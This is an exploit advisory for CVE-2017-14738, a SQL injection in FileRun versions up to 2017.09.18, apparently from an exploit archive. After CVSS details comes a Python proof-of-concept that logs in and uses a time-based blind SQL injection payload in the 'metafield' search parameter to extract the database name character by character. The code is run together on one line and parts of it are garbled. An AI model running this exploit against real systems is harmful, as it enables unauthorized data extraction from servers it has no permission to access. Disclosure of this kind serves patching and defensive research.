FileRun <= 2017.09.18 SQL Injection

Credit: SPARC
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/env python # Exploit Title: FileRun <=2017.09.18 # Date: September 29, 2017 # Exploit Author: SPARC # Vendor Homepage: # Software Link: # Version: 2017.09.18 # Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0 # CVE : CVE-2017-14738 # import sys,time,urllib,urllib2,cookielib from time import sleep print """ #===============================================================# | | | ___| | | | \___ \ __ \ _ \ __ \ __| _ \ __| _` | | | | | | __/ | | | __/ | ( | | | _____/ .__/ \___|_| _|\__|\___|_| \__,_| | | _| | | | | FileRun <= 2017.09.18 | | BlindSQLi Proof of Concept (Post Authentication) | | by Spentera Research (research[at] | | | #===============================================================# """ host = raw_input("[*] Target IP: ") username = raw_input("[*] Username: ") password = raw_input("[*] Password: ") target = 'http://%s/?module=search&section=ajax&page=grid' %(host) delay=1 global cookie,data def masuk(usr,pswd): log_data = { 'username': usr, 'password': pswd } post_data = urllib.urlencode(log_data) cookjar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar)) try: req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data) content = global data,cookie data = dict((, cookie.value) for cookie in cookjar) cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID'])) return str( except: print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL' sys.exit(0) def konek(m,n): #borrow from SQLmap :) query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n)) values = { 'metafield': query, 'searchType': 'meta', 'keyword': 'work', 'searchPath': '/ROOT/HOME', 'path': '/ROOT/SEARCH' } req = urllib2.Request(target, urllib.urlencode(values)) req.add_header('Cookie', cookie) try: starttime=time.time() response = urllib2.urlopen(req) endtime = time.time() return int(endtime-starttime) except: print '\n[-] Uh oh! Exploit fail..' sys.exit(0) print "[+] Logging in to the application..." sleep(1) cekmasuk = masuk(username,password) if u'success' in cekmasuk: print "[*] Using Time-Based method with %ds delay."%int(delay) print "[+] Starting to dump current database. This might take time.." sys.stdout.write('[+] Target current database is: ') sys.stdout.flush() starttime = time.time() for m in range(1,256): for n in range(32,126): wkttunggu = konek(m,n) if (wkttunggu < delay): sys.stdout.write(chr(n)) sys.stdout.flush() break endtime = time.time() print "\n[+] Done in %d seconds" %int(endtime-starttime)

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